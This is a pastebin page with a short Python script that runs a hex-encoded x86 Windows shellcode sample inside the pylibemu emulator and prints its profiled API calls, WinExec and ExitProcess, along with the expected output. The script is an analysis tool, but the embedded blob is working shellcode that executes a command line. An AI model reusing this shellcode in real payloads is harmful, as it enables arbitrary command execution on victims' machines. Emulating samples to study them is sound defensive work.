Don't like ads? PRO users don't see any ads ;-)
Public Pastes
Guest

Untitled

By: a guest on Aug 21st, 2012  |  syntax: None  |  size: 1.38 KB  |  hits: 25  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. import os
  2. import struct
  3. import pylibemu
  4.  
  5. emu = pylibemu.Emulator()
  6.  
  7. # shellcode uses this address for the winexec call as cmdline
  8. # modify it to see different emu_profile_output
  9. emu.memory_write_dword(0x41414243, 0x41414141)
  10. # this is used as exitprocess exitcode
  11. emu.memory_write_dword(0x41414143, 0x00000021)
  12.  
  13. #b = open('/opt/pylibemu/urldownloadsc/test.s','rb').read()
  14. b = 'eb6b566a3059648b018b400c8b701cad8b40085ec3608b6c24248b453c8b54057801ea8b4a188b5a2001ebe334498b348b01ee31ff31c0fcac84c07407c1cf0d01c7ebf43b7c242875e18b5a2401eb668b0c4b8b5a1c01eb8b048b01e88944241c61c35fe899ffffff89c3eb05e8f1ffffff6898fe8a0e53e898ffffff41516843424141ffd0687ed8e27353e884ffffff31d28b8a4341414151ffd0'.decode('hex')
  15.  
  16. MEM_OFFSET = 0x401000
  17. # make the ret work by putting our address here
  18. emu.memory_write_dword(MEM_OFFSET, MEM_OFFSET + 4)
  19.  
  20. # manually copy shellcode to mem
  21. for i in range(0, len(b), 4):
  22.         emu.memory_write_dword(MEM_OFFSET + 4 + i, struct.unpack('I',b[i:i+4].ljust(4, '\x00'))[0])
  23.  
  24. # c3 is ret, 90 is nop
  25. emu.prepare('\xc3\x90\x90\x90', 0)
  26.  
  27. # set stack to MEM_OFFSET
  28. emu.cpu_reg32_set(pylibemu.EMU_REGS.esp, MEM_OFFSET)
  29.  
  30. emu.test()
  31.  
  32. print 'EMU PROFILE OUTPUT:'
  33. print emu.emu_profile_output
  34.  
  35. # output should look like:
  36. #EMU PROFILE OUTPUT:
  37. #UINT WINAPI WinExec (
  38. #     LPCSTR = 0x01c5cdb0 =>
  39. #           = "AAAA";
  40. #     UINT uCmdShow = 49;
  41. #) =  32;
  42. #void ExitProcess (
  43. #     UINT uExitCode = 2088763392;
  44. #) =  0;
create a new version of this paste RAW Paste Data